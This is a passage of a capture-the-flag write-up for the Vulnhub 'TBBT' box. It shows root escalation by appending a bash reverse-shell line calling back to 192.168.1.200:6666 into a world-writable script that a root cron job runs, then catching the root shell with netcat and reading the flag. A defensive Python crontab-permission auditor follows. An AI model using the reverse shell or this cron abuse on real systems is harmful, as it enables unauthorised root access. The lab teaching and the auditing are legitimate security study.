# I am so smart
# Now I just have to code it...
# MAKE API CALL TO THERMOSTAT TO SET TEMP_VALUE=22
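The script is currently empty, and anyone has read and write permission on it, so it is enough to write a reverse-shell command into it: cron runs the script every minute, which returns a reverse shell, and that shell has root privileges: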
www-data@tbbt:/home/leonard$ echo 'bash -i >& /dev/tcp/192.168.1.200/6666 0>&1' >> /home/leonard/thermostat_set_temp.sh
<p/192.168.1.200/6666 0>&1' >> /home/leonard/thermostat_set_temp.sh
www-data@tbbt:/home/leonard$
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.1.200] from (UNKNOWN) [192.168.1.105] 46558
bash: cannot set terminal process group (22948): Inappropriate ioctl for device
bash: no job control in this shell
root@tbbt:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@tbbt:~# cd /root
cd /root
root@tbbt:~# ls
ls
FLAG-leonard.txt
root@tbbt:~# cat FLAG-lenonard.txt
cat FLAG-lenonard.txt
cat: FLAG-lenonard.txt: No such file or directory
root@tbbt:~# cat FLAG-leonard.txt
cat FLAG-leonard.txt
____
/ \
/______\
||
/~~~~~~~~\ || /~~~~~~~~~~~~~~~~\
/~ () () ~\ || /~ () () () () ~\
(_)========(_) || (_)==== ===========(_)
I|_________|I _||_ |___________________|
.////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Gongrats!
You have rooted the box! Now you can sit on Sheldons spot!
FLAG-leonard{17fc95224b65286941c54747704acd3e}
I hope you liked it!
root@tbbt:~#
Successfully obtained the root flag.
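The cron finding above comes down to a root job executing a file that unprivileged users can modify. As an added example (not part of the original write-up), this Python audit parses /etc/crontab-style text and reports every path run by root whose file or parent directory is writable by, or owned by, a non-trusted account; the sample crontab, the file tree and all function names are constructed for illustration.

```python
import os
import re
import shlex
import stat
import tempfile

ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

# Constructed sample in /etc/crontab format; {base} is a scratch directory.
SAMPLE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root {base}/home/leonard/thermostat_set_temp.sh
30 2 * * * root {base}/usr/local/sbin/backup.sh --full
15 3 * * * www-data {base}/var/www/cleanup.sh
@reboot root {base}/usr/local/sbin/backup.sh
"""


def parse_system_crontab(text):
    """Yield (user, command) for each job line in /etc/crontab format."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        # "@reboot user cmd" has one schedule field, the normal form has five.
        n_sched = 1 if line.startswith("@") else 5
        fields = line.split(None, n_sched + 1)
        if len(fields) == n_sched + 2:
            yield fields[n_sched], fields[n_sched + 1]


def absolute_paths(command):
    """Absolute paths named anywhere in the command, in order of appearance."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def weak_links(path, stop_at="/", trusted_uids=(0,)):
    """Check path and every parent directory below stop_at (symlinks resolved)."""
    findings = []
    path, stop_at = os.path.realpath(path), os.path.realpath(stop_at)
    while path != stop_at:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            findings.append((path, "missing"))
        else:
            if st.st_uid not in trusted_uids:
                findings.append((path, "owned by uid %d" % st.st_uid))
            if st.st_mode & stat.S_IWOTH:
                findings.append((path, "world-writable"))
            elif st.st_mode & stat.S_IWGRP:
                findings.append((path, "group-writable"))
        parent = os.path.dirname(path)
        if parent == path:  # reached the filesystem root
            break
        path = parent
    return findings


def audit_crontab(text, stop_at="/", trusted_uids=(0,), privileged=("root",)):
    """Report weak files and directories behind jobs run by privileged users."""
    report = []
    for user, command in parse_system_crontab(text):
        if user not in privileged:
            continue
        for target in absolute_paths(command):
            for where, why in weak_links(target, stop_at, trusted_uids):
                report.append({"user": user, "target": target,
                               "path": where, "issue": why})
    return report


def build_sample_tree(base):
    """Create the constructed file tree under base and return its crontab text."""
    layout = {
        "home/leonard/thermostat_set_temp.sh": 0o777,  # constructed: anyone can edit
        "usr/local/sbin/backup.sh": 0o755,             # only the owner can write
        "var/www/cleanup.sh": 0o777,                   # weak, but not run by root
    }
    for rel, mode in layout.items():
        full = os.path.join(base, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(full, mode)
    for dirpath, _dirs, _files in os.walk(base):
        os.chmod(dirpath, 0o755)  # fixed directory modes, independent of umask
    return SAMPLE.format(base=base)


if __name__ == "__main__":
    base = tempfile.mkdtemp(prefix="cron-audit-")
    for finding in audit_crontab(build_sample_tree(base), stop_at=base,
                                 trusted_uids=(0, os.getuid())):
        print(finding)
```

On a real host, feed it /etc/crontab and the files under /etc/cron.d with the default arguments. A finding is cleared by giving the script and every directory above it root ownership with no group or other write bit.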
From: https://www.cnblogs.com/jason-huawen/p/16975539.html